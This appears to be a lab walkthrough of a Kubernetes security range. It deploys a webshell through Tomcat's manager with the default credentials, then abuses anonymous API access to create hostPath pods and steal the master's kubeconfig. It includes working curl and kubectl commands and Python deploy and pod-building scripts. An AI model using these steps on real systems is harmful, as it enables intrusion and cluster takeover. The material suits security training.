This walkthrough uses the cloud security range built by 靓仔师傅.
1. WEB
Getting into the management console
Weak credentials: tomcat/tomcat
Log in to the console at http://192.168.139.134:32044/manager/html. A WAR cannot be deployed directly from that page, however.
Uploading the webshell
Use the Tomcat manager interfaces to upload the webshell. Reference:
https://www.anquanke.com/post/id/223002?display=mobile#h3-4
- manager-gui: access to the HTML interface (URL path /manager/html/*)
- manager-script: access to the plain-text interface (URL path /manager/text/*)
- manager-jmx: access to the JMX proxy interface (URL path /manager/jmxproxy/*)
- manager-status: access to Tomcat's read-only status page (URL path /manager/status/*)
We first tried uploading the WAR through the manager-gui (HTML) interface, but the page answered 403 and the upload failed, so we switched to the second interface, manager-script, i.e. the text interface under /manager/text/.
curl
curl -T C:\Users\Anonymous\Desktop\Behinder_v4.0.6\server\war\shell.war "http://192.168.139.134:32044/manager/text/deploy?path=/shell&update=true" -u tomcat:tomcat
-T uploads the file as the raw body of a PUT request; path is the context path the application is deployed under, and update=true replaces an existing deployment with the same path. The manager answers with a single line starting with OK - on success and FAIL - otherwise.
Burp Suite
Changing the request method to PUT also works.
URL path: /manager/text/deploy?path=/hacker
One check before sending: the text interface reads the raw request body as the WAR file (which is exactly what curl -T sends). If the request was captured from the HTML form upload, the body that reaches Tomcat must still be the bare WAR, starting with the PK zip signature, rather than a multipart boundary and form headers.
PUT /manager/text/deploy?path=/hacker HTTP/1.1
Host: 192.168.139.134:32044
Content-Length: 1099
Cache-Control: max-age=0
Authorization: Basic dG9tY2F0OnRvbWNhdA==
Upgrade-Insecure-Requests: 1
Origin: http://192.168.139.134:32044
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary53YRMlWM2mlPOZDV
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.139.134:32044/manager/html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=A2A0920F276F693C25F17DFA51B37242
Connection: close
------WebKitFormBoundary53YRMlWM2mlPOZDV
Content-Disposition: form-data; name="deployWar"; filename="hacker.war"
Content-Type: application/octet-stream
PK
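The deploy call above, as an added example that is not code from the original post or from Tomcat: it builds a minimal WAR in memory, computes the Basic header (the value matches the Authorization header in the captured request) and sends the WAR bytes as the raw PUT body. The target address and the tomcat/tomcat credentials are the page's; the JSP content is a harmless marker page of my own, not the webshell used in the write-up, and the request is only sent when the file is run as a script.

```python
"""Deploy a WAR through Tomcat's text manager interface, the call that
`curl -T ... /manager/text/deploy` makes: the WAR bytes are the raw PUT body
and the context path travels in the query string.

Added example for this write-up, not code from the original post or from
Tomcat. Target address and tomcat/tomcat credentials are the page's; the JSP
is a harmless marker page of my own, not the webshell used in the write-up.
"""
import base64
import http.client
import io
import zipfile
from urllib.parse import urlencode

# Constructed JSP: proves the deploy worked and shows which account Tomcat runs as.
MARKER_JSP = """<%@ page contentType="text/plain" %>
deployed-ok
user=<%= System.getProperty("user.name") %>
os=<%= System.getProperty("os.name") %>
"""


def build_war(jsp_source: str, jsp_name: str = "index.jsp") -> bytes:
    """A WAR is a zip; a single JSP at its root is enough for Tomcat to deploy
    it (no WEB-INF/web.xml needed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war: bytes) -> list:
    """File names inside a WAR, for checking what was built."""
    return zipfile.ZipFile(io.BytesIO(war)).namelist()


def basic_auth(user: str, password: str) -> str:
    """Value of the Authorization header for HTTP Basic auth."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def deploy_request(war: bytes, context_path: str, user: str, password: str,
                   update: bool = True) -> tuple:
    """Method, URL, headers and body of the deploy call. The body is the bare
    WAR: no multipart boundary or form headers in front of the PK signature."""
    query = {"path": context_path}
    if update:
        query["update"] = "true"        # replace an existing deployment
    url = "/manager/text/deploy?" + urlencode(query, safe="/")
    headers = {
        "Authorization": basic_auth(user, password),
        "Content-Type": "application/octet-stream",
        "Content-Length": str(len(war)),
    }
    return "PUT", url, headers, war


def send_deploy(host: str, port: int, war: bytes, context_path: str,
                user: str, password: str) -> str:
    """Send the request and return the manager's one-line reply, which starts
    with 'OK - ' on success and 'FAIL - ' otherwise."""
    method, url, headers, body = deploy_request(war, context_path, user, password)
    conn = http.client.HTTPConnection(host, port, timeout=15)
    try:
        conn.request(method, url, body=body, headers=headers)
        return conn.getresponse().read().decode(errors="replace").strip()
    finally:
        conn.close()


if __name__ == "__main__":
    war = build_war(MARKER_JSP)
    print(send_deploy("192.168.139.134", 32044, war, "/shell", "tomcat", "tomcat"))
    # then request http://192.168.139.134:32044/shell/index.jsp to see the marker
```

After an OK - reply, requesting /shell/index.jsp on the target shows the marker output; replacing MARKER_JSP with the webshell's JSP is the only change needed to reproduce the write-up's step.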
Connect to the webshell.
2. Intranet
Information gathering
The environment inside the container contains KUBERNETES_PORT=tcp://10.68.0.1:443, which gives away the address of the Kubernetes API server.
cdk approach
./cdk evaluate
It reports that the API server allows unauthenticated (anonymous) access.
Listing pods
curl -k https://10.68.0.1:443/api/v1/namespaces/default/pods
cdk approach (kcurl anonymous sends the request with no credentials at all)
./cdk kcurl anonymous get "https://10.68.0.1:443/api/v1/namespaces/default/pods?limit=500"
Creating a pod with the node's filesystem mounted
The write-up calls this a "privileged pod"; it does not set privileged: true but mounts the node's root filesystem at /host through a hostPath volume, which already gives read and write access to everything on that node.
#hostPath pod
cat > nginx-pod.yaml << EOF
apiVersion: v1
kind: Pod
metadata:
  name: test-444
spec:
  containers:
  - name: test-444
    image: nginx:1.14.2
    volumeMounts:
    - name: host
      mountPath: /host
  volumes:
  - name: host
    hostPath:
      path: /
      type: Directory
EOF
#create it through the API (the API server accepts a YAML body with this content type)
curl -k https://10.68.0.1:443/api/v1/namespaces/default/pods -X POST --header 'content-type: application/yaml' --data-binary @nginx-pod.yaml
Downloading kubectl
curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
Because the shell is non-interactive, a password cannot be typed in, so the command was changed to pass credentials on the command line:
./kubectl --server=https://10.68.0.1 --insecure-skip-tls-verify=true --username=a --password=a get pods
- --server=https://10.68.0.1: the address of the Kubernetes API server.
- --insecure-skip-tls-verify=true: skip verification of the API server's TLS certificate, since our kubectl does not trust the cluster CA.
- --username=a --password=a: HTTP Basic credentials. An API server without a basic-auth authenticator (the --basic-auth-file option was removed in Kubernetes 1.19) ignores this header and evaluates the request as system:anonymous, which is precisely the unauthenticated access cdk reported; the values themselves are arbitrary.
Looking for a token (a kubeconfig on the node)
./kubectl --server=https://10.68.0.1 --insecure-skip-tls-verify=true --username=a --password=a exec test-444 -- bash -c "ls -alh /host/root/.kube"
Taint
The previous step landed us on another (worker) node, which holds no token, so we try to reach the master by tolerating its taint.
Check the taints; the Taints: line of the master node is what the toleration below has to match (key and effect):
./kubectl --server=https://10.68.0.1 --insecure-skip-tls-verify=true --username=a --password=a describe nodes
Creating the pod
(the first attempt failed because of a YAML formatting error)
#create the pod
cat > aaa.yaml << EOF
apiVersion: v1
kind: Pod
metadata:
  name: control-master
spec:
  tolerations:
  - key: node.kubernetes.io/unschedulable
    operator: Exists
    effect: NoSchedule
  containers:
  - name: control-master-15
    image: ubuntu:18.04
    command: ["/bin/sleep", "3650d"]
    volumeMounts:
    - name: master
      mountPath: /master
  volumes:
  - name: master
    hostPath:
      path: /
      type: Directory
EOF
node.kubernetes.io/unschedulable is the taint a node carries once it has been cordoned; use whatever key and effect describe nodes reports for the master (on kubeadm clusters usually node-role.kubernetes.io/control-plane:NoSchedule, or node-role.kubernetes.io/master:NoSchedule on older releases). A toleration only permits the scheduler to place the pod on the tainted node, it does not force it there; if the pod still ends up on a worker, pin it with nodeName: <master node name> in the spec.
#create the container
./kubectl --server=https://10.68.0.1 --insecure-skip-tls-verify=true --username=a --password=a create -f ./aaa.yaml
#check which node the pod landed on (NODE column)
./kubectl --server=https://10.68.0.1 --insecure-skip-tls-verify=true --username=a --password=a get pods -o wide
cdk approach
https://github.com/cdk-team/CDK/wiki/Tool:-kcurl
In the author's run, the pod created through cdk landed directly on the master.
#POST body (the kubectl.kubernetes.io/last-applied-configuration annotation is bookkeeping left behind by kubectl apply; the API server does not need it, and when kept its value must be a JSON-escaped string as shown)
{"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{"kubectl.kubernetes.io/last-applied-configuration":"{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"annotations\":{},\"name\":\"test-123\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"image\":\"nginx:1.14.2\",\"name\":\"test-123\",\"volumeMounts\":[{\"mountPath\":\"/host\",\"name\":\"host\"}]}],\"volumes\":[{\"hostPath\":{\"path\":\"/\",\"type\":\"Directory\"},\"name\":\"host\"}]}}\n"},"name":"test-123","namespace":"default"},"spec":{"containers":[{"image":"nginx:1.14.2","name":"test-123","volumeMounts":[{"mountPath":"/host","name":"host"}]}],"volumes":[{"hostPath":{"path":"/","type":"Directory"},"name":"host"}]}}
#URL
https://10.68.0.1:443/api/v1/namespaces/default/pods?fieldManager=kubectl-client-side-apply&fieldValidation=Strict
./cdk kcurl anonymous post 'https://10.68.0.1:443/api/v1/namespaces/default/pods?fieldManager=kubectl-client-side-apply&fieldValidation=Strict' '{"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{"kubectl.kubernetes.io/last-applied-configuration":"{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"annotations\":{},\"name\":\"test-444\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"image\":\"nginx:1.14.2\",\"name\":\"test-444\",\"volumeMounts\":[{\"mountPath\":\"/host\",\"name\":\"host\"}]}],\"volumes\":[{\"hostPath\":{\"path\":\"/\",\"type\":\"Directory\"},\"name\":\"host\"}]}}\n"},"name":"test-444","namespace":"default"},"spec":{"containers":[{"image":"nginx:1.14.2","name":"test-444","volumeMounts":[{"mountPath":"/host","name":"host"}]}],"volumes":[{"hostPath":{"path":"/","type":"Directory"},"name":"host"}]}}'
Reading the kubeconfig from the master
./kubectl --server=https://10.68.0.1 --insecure-skip-tls-verify=true --username=a --password=a exec control-master -- bash -c "cat /master/root/.kube/config"
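The two pod-creation steps above (the hostPath pod and the tolerating pod that reaches the master) share one added example, which is not code from the original post, kubectl or cdk: it parses the Taints: lines of describe nodes output, turns them into tolerations, builds the hostPath pod pinned to the master with nodeName, and then audits the resulting manifest the way a defender's admission check would. The describe output is constructed (the page does not reproduce the real one), and the node and pod names are assumptions.

```python
"""Build the tolerating hostPath pod from the taints a node actually carries,
and audit such a manifest the way an admission check would.

Added example for this write-up, not code from the original post, kubectl or
cdk. The describe-nodes fragment is constructed (the page does not reproduce
the real one); node and pod names are assumptions.
"""
import json
import re

# Constructed fragment of `kubectl describe nodes`: one block per node, the
# first taint on the "Taints:" line and any further taints on indented lines.
DESCRIBE_NODES = """\
Name:               k8s-master
Roles:              control-plane,master
Taints:             node-role.kubernetes.io/control-plane:NoSchedule
                    node.kubernetes.io/unschedulable:NoSchedule
Unschedulable:      true
Name:               k8s-node1
Roles:              <none>
Taints:             <none>
Unschedulable:      false
"""

# describe prints taints as key[=value]:Effect
TAINT_RE = re.compile(r"^(?P<key>[^=:\s]+)(?:=(?P<value>[^:\s]*))?:(?P<effect>\w+)$")


def parse_taints(describe_output: str) -> dict:
    """Map node name -> list of {key[, value], effect} taints."""
    taints, node, in_taints = {}, None, False
    for line in describe_output.splitlines():
        if line.startswith("Name:"):
            node = line.split(None, 1)[1]
            taints[node] = []
            in_taints = False
            continue
        if line.startswith("Taints:"):
            in_taints = True
            item = line[len("Taints:"):].strip()
        elif in_taints and line[:1].isspace():
            item = line.strip()          # continuation line: another taint
        else:
            in_taints = False
            continue
        m = TAINT_RE.match(item)         # "<none>" does not match and is skipped
        if m:
            taints[node].append({k: v for k, v in m.groupdict().items() if v is not None})
    return taints


def tolerations_for(taints: list) -> list:
    """One toleration per taint; Exists tolerates the key whatever its value."""
    return [{"key": t["key"], "operator": "Exists", "effect": t["effect"]} for t in taints]


def control_plane_node(taints_by_node: dict):
    """Name of the first node carrying a node-role.kubernetes.io/* taint, or None."""
    for node, taints in taints_by_node.items():
        if any(t["key"].startswith("node-role.kubernetes.io/") for t in taints):
            return node
    return None


def hostpath_pod(name: str, node_name: str, tolerations: list,
                 image: str = "ubuntu:18.04", mount_path: str = "/master") -> dict:
    """Pod that mounts the node's root filesystem, pinned to node_name.
    A toleration only permits scheduling onto the tainted node; nodeName forces
    it and bypasses the scheduler (hence NoSchedule taints). NoExecute taints
    are enforced by the node controller instead, so the tolerations stay."""
    return {
        "apiVersion": "v1",
        "kind": "Pod",
        "metadata": {"name": name, "namespace": "default"},
        "spec": {
            "nodeName": node_name,
            "tolerations": tolerations,
            "containers": [{
                "name": name,
                "image": image,
                "command": ["/bin/sleep", "3650d"],
                "volumeMounts": [{"name": "host", "mountPath": mount_path}],
            }],
            "volumes": [{"name": "host", "hostPath": {"path": "/", "type": "Directory"}}],
        },
    }


def audit_pod(pod: dict) -> list:
    """Findings a defender's admission policy would raise for this manifest."""
    findings, spec = [], pod.get("spec", {})
    for v in spec.get("volumes", []):
        hp = v.get("hostPath")
        if hp:
            sev = "critical" if hp.get("path") == "/" else "high"
            findings.append(f"{sev}: hostPath volume {v['name']!r} exposes host path {hp.get('path')!r}")
    for c in spec.get("containers", []):
        if c.get("securityContext", {}).get("privileged"):
            findings.append(f"critical: container {c['name']!r} runs privileged")
    for t in spec.get("tolerations", []):
        key = t.get("key", "")
        if key.startswith("node-role.kubernetes.io/") or key == "node.kubernetes.io/unschedulable":
            findings.append(f"high: toleration of {key!r} allows placement on a control-plane or cordoned node")
    if spec.get("nodeName"):
        findings.append(f"medium: nodeName={spec['nodeName']!r} bypasses the scheduler")
    return findings


if __name__ == "__main__":
    taints = parse_taints(DESCRIBE_NODES)
    master = control_plane_node(taints)
    pod = hostpath_pod("control-master", master, tolerations_for(taints[master]))
    print(json.dumps(pod, indent=2))  # body for POST /api/v1/namespaces/default/pods
    print("\n".join(audit_pod(pod)))
```

The printed JSON can be posted exactly as the page does (curl with content-type application/json, or cdk kcurl anonymous post); the audit output is the same list of signals an admission controller or a Pod Security Admission policy would key on, which is why the restricted profile rejects hostPath volumes outright.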
Originally published on the WeChat official account Relay学安全: Kubernetes Range